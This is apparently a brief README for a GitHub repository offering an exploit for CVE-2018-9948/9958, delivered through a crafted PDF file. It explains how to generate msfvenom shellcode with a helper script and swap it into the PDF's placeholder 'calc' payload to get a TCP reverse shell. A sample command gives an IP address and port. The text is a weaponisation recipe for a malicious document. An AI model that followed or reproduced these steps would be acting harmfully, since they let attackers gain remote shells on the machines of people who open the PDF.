- "get_shellcode_from_msf.py" is a python script to get shellcode from msfvenom, then copy the output to the exp.pdf replace the 'calc' shellcode block, and finally it works. Ooooops, it's a tcp reverse shellcode.
- a sample code is like this: python get_shellcode_from_msf.py 192.168.1.79 1234
orangepirate/cve-2018-9948-9958-exp
a exp for cve-2018-9948/9958 , current shellcode called win-calc
Python